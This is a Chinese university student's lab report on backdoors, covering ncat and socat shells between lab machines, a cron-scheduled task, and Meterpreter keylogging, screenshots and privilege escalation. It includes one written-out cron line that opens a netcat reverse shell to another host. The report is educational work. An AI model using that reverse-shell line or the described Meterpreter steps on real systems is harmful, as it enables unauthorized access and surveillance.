20145212罗天晨 后门原理与实践

20145212罗天晨 后门原理与实践


基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 我们在安装常用应用软件时,安装过程中附带的可能就有后门程序。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • windows:实验中做过的方式有直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序
  • linux:通过在cron中添加任务,定时执行、通过一些脚本启动后门程序、通过和其他程序捆绑运行后门程序。

(3)Meterpreter有哪些给你映像深刻的功能?

  • 可以获取目标主机摄像头摄像头摄像头!!!这个功能好可怕……
  • 可以提权,并且针对不同的系统,提权的方式有很多种,由于我在实验中尝试用getsystem提权失败之后上网查看了教程,愈发觉得meterpreter很强大很可怕。。其中找到一篇写了windows下各种提权方法的博客,我后来的提权操作也是从这里借鉴的:
    Windows的多种提权方法

(4)如何发现自己有系统有没有被安装后门?

  • 低级一点的后门程序估计寻常的杀毒软件就可以查杀,比如我这次实验做的,一发送给win10主机就被360毙了。
  • 至于隐藏的稍深一些的后门,例如与软件捆绑的后门,我查了一下方法,可以下载一些比较专业的监视软件,例如下载者监视器1.0、Regmon704.rar等进行检测。
  • 还可以用抓包工具分析可疑软件是否有可疑操作,比如连接了一些乱七八糟的ip、在注册表项里操作了之类的。

实验总结体会

做了这次实验觉得小时候看起来无懈可击的电脑实际上漏洞百出,很容易就能被攻击。而且一些后门的存在让人有些无力感,因为windows操作系统本身就极有可能被留有后门……这样的话就算自己再怎么查杀也还是无法幸免,而且其他的操作系统大概也是一样的,感觉好不安。


实践过程记录

一、ncat的使用

1.实现两台虚拟机的互联

  • 本实验中实现了与5226夏艺华的虚拟机互联,以下是对话截图=..=

2.让本机的Windows获得Linux的Shell

  • 如图所示,使用本机windows系统获得linux系统的shell:

3.让linux获得windows的shell

  • 如图所示,在虚拟机中获得了windows的shell之后我输入了ipconfig,成功查看到了windows本机的ip地址信息,不过有很多乱码。

4.使用ncat实现文件传输

  • 如图所示,先在windows中打开监听,然后在linux系统中发送文件:

  • 传输的文件保存在了C:UsersLenovo路径下,可以查看:(一开始以为保存在ncat所在的文件目录下=o=找了半天)

5.cron的启动

  • 这里首先在linux中输入crontab -e指令,通过编辑增加一条定时任务
    从图中可以看出我输入的是29 * * * * /bin/netcat 10.1.1.120 5212 -e /bin/sh
    意味着在每个小时的29分,如果有一台ip地址为10.1.1.120的主机监听着linux,就会得到一个shell

  • 29分之前在主机上输入什么都不会有显示,但是一到29分,就可以使用指令查看虚拟机中的相关信息,这里我使用了ls指令,结果如下:

……比较好奇为什么这里使用ls查看到的内容和第二步让本机的Windows获得Linux的Shell中查看到的不一样,而且有乱码…


二、socat的使用

使用socat获取主机操作Shell

  • 原理和之前使用ncat的时候是一样的,这次在linux上绑定端口并且反弹连接,使用windows系统开启监听
  • 这里也是在成功之后使用了ifconfig和ls进行测试:


任务计划启动

  • 在主机的控制面板中找到计划任务,打开任务计划程序,创建一个新任务,在操作选项中选择如下:

  • 进行测试:


三、meterpreter的使用

1.生成后门程序

  • 在虚拟机上使用指令生成后门程序,并通过ncat发送到windows主机上

  • 这里没关360的时候直接被发现并且查杀了……

  • 关闭360之后,打开msf进行相关设置,将端口号和ip地址都改成和生成后门程序时一样的数据,再在windows上运行后门程序:

  • 得到shell,输入dir可以显示windows的磁盘目录信息:

  • 可以通过shell指令得到windows的命令行界面,部分乱码可以忽略,这里使用了slmgr/div命令进行测试,主机上弹出版本号信息:

  • 对windows主机进行击键记录:

  • 对主机进行截屏并查看:

  • 安装系统服务:

  • 提升权限:

输入getuid查看当前用户权限
输入getsystem进行提权,但是这里显示由于环境错误,提权失败

换提权方式:使用MS14-058之类的Exp进行提权,结果这个模块对于64为机不适用

再换==这次显示win10不易受这个攻击??

我是该高兴自己的win10稍微安全那么一点点吗?……试了半天发现都没有正确的攻破win10……于是果断的换成了攻击我安装的win7虚拟机……
成功的进行了提权:

原文地址:https://www.cnblogs.com/alovera/p/6542235.html